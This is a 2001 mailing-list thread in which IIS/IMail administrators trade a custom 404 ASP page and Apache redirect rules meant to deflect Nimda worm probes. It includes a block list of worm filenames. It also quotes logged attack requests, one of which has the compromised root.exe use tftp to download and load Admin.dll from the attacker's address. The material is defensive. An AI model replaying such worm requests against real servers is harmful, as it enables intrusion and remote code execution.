Dear Ron:
I wrote you about this earlier and didn't get a reply, please let me know
what you think!
I tried to implement the code you mentioned below but it seems i am still
getting some of those bad requests... see here..
this is the log file from imail server (standalone that is running win2k
server and IIS 5.0 with your your ezsignup utility.
20010927 033141 216.254.88.229, , , GET /scripts/root.exe?/c+dir HTTP/1.0
20010927 033142 216.254.88.229, , , GET
/scripts/root.exe?/c+tftp%20-i%20216.254.88.229%20GET%20Admin.dll%20Admin.dl
l HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/Admin.dll HTTP/1.0
20010927 033143 216.254.88.229, , , GET /MSADC/root.exe?/c+dir HTTP/1.0
any ideas, maybe i havn't configured it properly? I revised the code a bit
to redirect to the home page after 5 seconds... could that cause it?
Maybe i installed it in the wrong place, please advise me, thanks!
here is my "version"
<%
myRequest=Request.ServerVariables("QUERY_STRING")
'A list of filenames virus looks for or in this case to protect
myBadList="cmd.exe,root.exe,admin.dll,default.ida,.exe,.dll,.ida,.htr,.print
er"
'Detect a GET request from the Nimda virus and take appropriate action
arrBadString=Split(myBadList,",")
for i=0 to UBound(arrBadString)
if inStr(myRequest,arrBadString(i))>0 then
'turn offending server back on itself
Response.redirect "http://127.0.0.1";
end if
next
%>
<HTML>
<HEAD>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<SCRIPT LANGUAGE="JAVASCRIPT">
var timerID="";
function loadPage()
{
clearTimeout(timerID);
window.location.href="/";
}
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT1.1">
function loadPage()
{
clearTimeout(timerID);
window.location.href="/";
}
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT1.2">
function loadPage()
{
clearTimeout(timerID);
window.location.href="/";
}
</SCRIPT>
<a href="/">Home Page</a>.
</HEAD>
<BODY BGCOLOR="#000000">
<BR><BR><BR><BR><BR>
<CENTER><STRONG><EM>
<FONT COLOR="#FFFF00" SIZE="+2">sorry..., that page is missing or has been
moved, <br>redirecting to home page.</FONT>
</EM></STRONG></CENTER>
<SCRIPT LANGUAGE="JAVASCRIPT">
timerID=setTimeout("loadPage()", 4500);
</SCRIPT>
</BODY>
</HTML>
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron
Hornbaker
Sent: Friday, September 21, 2001 2:35 PM
To: [EMAIL PROTECTED]
Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
[isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
If it's a legitimate file, it won't return a 404 error, so the Judo page
won't be triggered. So, technically, you could make your badlist look
something like:
".exe,.dll,.ida,.htr,.printer"
and whatever else you wanted, so that any malicious-looking 404s would
turned back, Grasshopper-san-style.
Ron Hornbaker
President/CTO
. . . . . . . . . . . . http://humankindsystems.com
. . . . . . . . . . . . w e c o d e. w e c a r e.
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Charles Frolick
> Sent: Friday, September 21, 2001 4:30 PM
> To: [EMAIL PROTECTED]
> Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
> [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
>
>
> Not sure how it is used, but Frontpage extensions actually uses
> a admin.dll
> in the frontpage directories. Need to make sure your sites
> don't need it
> for normal operation.
>
> Chuck Frolick
> ArgoNet, Inc.
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron
> Hornbaker
> Sent: Friday, September 21, 2001 3:24 PM
> To: [EMAIL PROTECTED]
> Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
> [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
>
>
> Change the code to this and just edit the comma-delimited myBadList
> variable:
>
> <%
> 'Custom404.asp page to thwart Nimda DoS attacks on IIS
> 'by Humankind Systems, Inc. http://hksi.net/
> 'No support or guarantees of any kind are granted with this
> 'code. Use at your own risk. Distribute freely.
>
> 'Get the entire URL requested
> myRequest=Request.ServerVariables("QUERY_STRING")
>
> 'A list of filenames Nimda looks for
> myBadList="cmd.exe,root.exe,admin.dll,default.ida"
>
> 'Detect a GET request from the Nimda virus and take appropriate action
> arrBadString=Split(myBadList,",")
> for i=0 to UBound(arrBadString)
> if inStr(myRequest,arrBadString(i))>0 then
> 'turn offending server back on itself
> Response.redirect "http://127.0.0.1";
> end if
> next
> %>
> <html>
> <head>
> <title>Page Not Found</title>
> </head>
> <body>
> Sorry, but that page was not found on our server.
> <p>
> Here is a link back to our <a href="/">Home Page</a>.
> </body>
> </html>
>
>
>
> Ron Hornbaker
> President/CTO
> . . . . . . . . . . . . http://humankindsystems.com
> . . . . . . . . . . . . w e c o d e. w e c a r e.
>
>
>
>
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On
> Behalf Of Len
> > Conrad
> > Sent: Friday, September 21, 2001 3:06 PM
> > To: [EMAIL PROTECTED]
> > Subject: Fwd: [isp-linux] Re: [imail] Buaaa Haaa Ha Haaaaaaaaa...
> >
> >
> > Ron,
> >
> > what about admin.dll, and here�s a couple more
> >
> > Len
> >
> > --------------------
> >
> >
> > >From: "Bill Larson" <[EMAIL PROTECTED]>
> > >To: [EMAIL PROTECTED]
> > >Subject: [isp-linux] Re: Buaaa Haaa Ha Haaaaaaaaa...
> > >Date: Fri, 21 Sep 2001 14:21:24 -0500
> > >X-Mailer: Microsoft Outlook Express 6.00.2600.0000
> > >List-Unsubscribe: <mailto:[EMAIL PROTECTED]>
> > >Reply-To: [EMAIL PROTECTED]
> > >X-INTM-Message-Id:
> > ><INTM-62637-1230739-2001.09.21-14.26.57--lconrad#go2france.com@
> > lists.isp-lists.com>
> > >X-Virus-Scanned: by VirusGate.MEIway.com
> > >X-RCPT-TO: <[EMAIL PROTECTED]>
> > >
> > >RedirectMatch (.*)\cmd.exe$ http://127.0.0.1
> > >RedirectMatch (.*)\default.ida$ http://127.0.0.1
> > >RedirectMatch (.*)\root.exe$ http://127.0.0.1
> > >
> > >I added a couple
> > >
> > >----- Original Message -----
> > >From: "Nick Weerheim" <[EMAIL PROTECTED]>
> > >To: <[EMAIL PROTECTED]>
> > >Sent: Friday, September 21, 2001 2:16 PM
> > >Subject: [isp-linux] Re: Buaaa Haaa Ha Haaaaaaaaa...
> > >
> > >
> > > > this is freaky.... the attacks here have stopped too....
> > thats crazy.....
>
>
>
>
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists
>
>
>
>
>
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists
>
>
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
